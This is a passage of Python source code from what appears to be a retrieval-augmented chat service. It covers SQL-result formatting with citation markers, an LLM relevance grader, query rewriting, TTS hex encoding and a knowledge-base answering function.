
请纠正SQL中的错误再写一遍,且只要SQL,不要有其他说明及文字。
""".format(
            index_name(tenant_id),
            "\n".join([f"{k}: {v}" for k, v in field_map.items()]),
            question, sql, tbl["error"]
        )
        tbl, sql = get_table()
        chat_logger.info("TRY it again: {}".format(sql))

    chat_logger.info("GET table: {}".format(tbl))
    if tbl.get("error") or len(tbl["rows"]) == 0:
        return None

    docid_idx = set([ii for ii, c in enumerate(
        tbl["columns"]) if c["name"] == "doc_id"])
    docnm_idx = set([ii for ii, c in enumerate(
        tbl["columns"]) if c["name"] == "docnm_kwd"])
    clmn_idx = [ii for ii in range(
        len(tbl["columns"])) if ii not in (docid_idx | docnm_idx)]

    # Compose a markdown table from the result set.
    clmns = "|" + "|".join([re.sub(r"(/.*|([^()]+))", "", field_map.get(tbl["columns"][i]["name"],
                                                                          tbl["columns"][i]["name"])) for i in
                            clmn_idx]) + ("|Source|" if docid_idx and docnm_idx else "|")

    line = "|" + "|".join(["------" for _ in range(len(clmn_idx))]) + \
           ("|------|" if docid_idx and docnm_idx else "")

    rows = ["|" +
            "|".join([rmSpace(str(r[i])) for i in clmn_idx]).replace("None", " ") +
            "|" for r in tbl["rows"]]
    if quota:
        # Append ##N$$ citation markers so the frontend can link each row
        # back to its source document.
        rows = "\n".join([r + f" ##{ii}$$ |" for ii, r in enumerate(rows)])
    else:
        rows = "\n".join(rows)
    rows = re.sub(r"T[0-9]{2}:[0-9]{2}:[0-9]{2}(\.[0-9]+Z)?\|", "|", rows)

    if not docid_idx or not docnm_idx:
        chat_logger.warning("SQL missing field: " + sql)
        return {
            "answer": "\n".join([clmns, line, rows]),
            "reference": {"chunks": [], "doc_aggs": []},
            "prompt": sys_prompt
        }

    docid_idx = list(docid_idx)[0]
    docnm_idx = list(docnm_idx)[0]
    doc_aggs = {}
    for r in tbl["rows"]:
        if r[docid_idx] not in doc_aggs:
            doc_aggs[r[docid_idx]] = {"doc_name": r[docnm_idx], "count": 0}
        doc_aggs[r[docid_idx]]["count"] += 1
    return {
        "answer": "\n".join([clmns, line, rows]),
        "reference": {"chunks": [{"doc_id": r[docid_idx], "docnm_kwd": r[docnm_idx]} for r in tbl["rows"]],
                      "doc_aggs": [{"doc_id": did, "doc_name": d["doc_name"], "count": d["count"]} for did, d in
                                   doc_aggs.items()]},
        "prompt": sys_prompt
    }


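# --- Output sketch (illustrative; hypothetical field names) ---
# For field_map {"age_int": "age/年龄"} a successful call returns a markdown
# table plus references, roughly:
#
#     |age|Source|
#     |------|------|
#     |28| ##0$$ |
#
# where ##0$$ is the citation marker the frontend resolves against
# reference["chunks"][0]. With quota=False the marker is omitted.

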
def relevant(tenant_id, llm_id, question, contents: list):
    if llm_id2llm_type(llm_id) == "image2text":
        chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
    else:
        chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
    prompt = """
You are a grader assessing the relevance of a retrieved document to a user question.
It does not need to be a stringent test. The goal is to filter out erroneous retrievals.
If the document contains keyword(s) or semantic meaning related to the user question, grade it as relevant.
Give a binary score, 'yes' or 'no', to indicate whether the document is relevant to the question.
No other words are needed except 'yes' or 'no'.
"""
    if not contents:
        return False
    contents = "Documents: \n" + " - ".join(contents)
    contents = f"Question: {question}\n" + contents
    # Leave a little room for the model's one-word reply.
    if num_tokens_from_string(contents) >= chat_mdl.max_length - 4:
        contents = encoder.decode(encoder.encode(contents)[:chat_mdl.max_length - 4])
    ans = chat_mdl.chat(prompt, [{"role": "user", "content": contents}], {"temperature": 0.01})
    return ans.lower().find("yes") >= 0


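# --- Usage sketch (illustrative; not part of the original module) ---
#     ok = relevant(tenant_id, "gpt-4o", "What is RAGFlow?",
#                   [ck["content_with_weight"] for ck in kbinfos["chunks"]])
#     # True if the grader model answers "yes"; an empty chunk list is False.

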
def rewrite(tenant_id, llm_id, question):
    if llm_id2llm_type(llm_id) == "image2text":
        chat_mdl = LLMBundle(tenant_id, LLMType.IMAGE2TEXT, llm_id)
    else:
        chat_mdl = LLMBundle(tenant_id, LLMType.CHAT, llm_id)
    prompt = """
You are an expert at query expansion, generating paraphrases of a question.
Relevant information cannot be retrieved from the knowledge base using the user's question directly.
You need to expand or paraphrase the user's question in multiple ways, such as using synonymous words/phrases,
writing abbreviations out in full, adding extra descriptions or explanations,
changing the way of expression, translating the original question into another language (English/Chinese), etc.
Return 5 versions of the question, one of which is a translation.
Just list the questions. No other words are needed.
"""
    ans = chat_mdl.chat(prompt, [{"role": "user", "content": question}], {"temperature": 0.8})
    return ans


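# --- Usage sketch (illustrative; not part of the original module) ---
#     variants = rewrite(tenant_id, "gpt-4o", "What's RAG?")
#     # `variants` is one text blob listing 5 paraphrases (one translated);
#     # a caller might splitlines() it and retrieve with each variant.

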
def tts(tts_mdl, text):
    if not tts_mdl or not text:
        return
    # Named bin_data rather than `bin`, to avoid shadowing the builtin.
    bin_data = b""
    for chunk in tts_mdl.tts(text):
        bin_data += chunk
    return binascii.hexlify(bin_data).decode("utf-8")


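# --- Usage sketch (illustrative; not part of the original module) ---
#     hex_audio = tts(tts_mdl, "Hello")          # hex string, e.g. "4944..."
#     audio = binascii.unhexlify(hex_audio)      # raw bytes for playback
#     # Returns None when no TTS model is configured or the text is empty.

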
def ask(question, kb_ids, tenant_id):
    kbs = KnowledgebaseService.get_by_ids(kb_ids)
    embd_nms = list(set([kb.embd_id for kb in kbs]))

    is_kg = all([kb.parser_id == ParserType.KG for kb in kbs])
    retr = retrievaler if not is_kg else kg_retrievaler

    embd_mdl = LLMBundle(tenant_id, LLMType.EMBEDDING, embd_nms[0])
    chat_mdl = LLMBundle(tenant_id, LLMType.CHAT)
    max_tokens = chat_mdl.max_length

    kbinfos = retr.retrieval(question, embd_mdl, tenant_id, kb_ids, 1, 12, 0.1, 0.3, aggs=False)
    knowledges = [ck["content_with_weight"] for ck in kbinfos["chunks"]]

    # Keep only as many chunks as fit into 97% of the model window.
    used_token_count = 0
    for i, c in enumerate(knowledges):
        used_token_count += num_tokens_from_string(c)
        if max_tokens * 0.97 < used_token_count:
            knowledges = knowledges[:i]
            break

    prompt = """
Role: You're a smart assistant. Your name is Miss R.
Task: Summarize the information from the knowledge bases and answer the user's question.
Requirements and restrictions:
  - DO NOT make things up, especially for numbers.
  - If the information from the knowledge bases is irrelevant to the user's question, JUST SAY: Sorry, no relevant information provided.
  - Answer with markdown format text.
  - Answer in the language of the user's question.

### Information from knowledge bases
%s

The above is information from knowledge bases.

""" % "\n".join(knowledges)
    msg = [{"role": "user", "content": question}]

    def decorate_answer(answer):
        nonlocal knowledges, kbinfos, prompt
        answer, idx = retr.insert_citations(answer,
                                            [ck["content_ltks"]
                                             for ck in kbinfos["chunks"]],
                                            [ck["vector"]
                                             for ck in kbinfos["chunks"]],
                                            embd_mdl,
                                            tkweight=0.7,
                                            vtweight=0.3)
        idx = set([kbinfos["chunks"][int(i)]["doc_id"] for i in idx])
        recall_docs = [
            d for d in kbinfos["doc_aggs"] if d["doc_id"] in idx]
        if not recall_docs:
            recall_docs = kbinfos["doc_aggs"]
        kbinfos["doc_aggs"] = recall_docs
        refs = deepcopy(kbinfos)
        for c in refs["chunks"]:
            if c.get("vector"):
                del c["vector"]

        if answer.lower().find("invalid key") >= 0 or answer.lower().find("invalid api") >= 0:
            answer += " Please set LLM API-Key in 'User Setting -> Model Providers -> API-Key'"
        return {"answer": answer, "reference": refs}

    answer = ""
    for ans in chat_mdl.chat_streamly(prompt, msg, {"temperature": 0.1}):
        answer = ans
        yield {"answer": answer, "reference": {}}
    yield decorate_answer(answer)


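# --- Usage sketch (illustrative; not part of the original module) ---
# A lighter-weight sibling of chat(): no Dialog object, fixed retrieval
# settings (top 12 chunks, 0.1 similarity threshold, 0.3 vector weight):
#
#     final = None
#     for chunk in ask("What is RAGFlow?", kb_ids=["kb_1"], tenant_id=tid):
#         final = chunk                  # last yield carries the citations
#     print(final["answer"], final["reference"]["doc_aggs"])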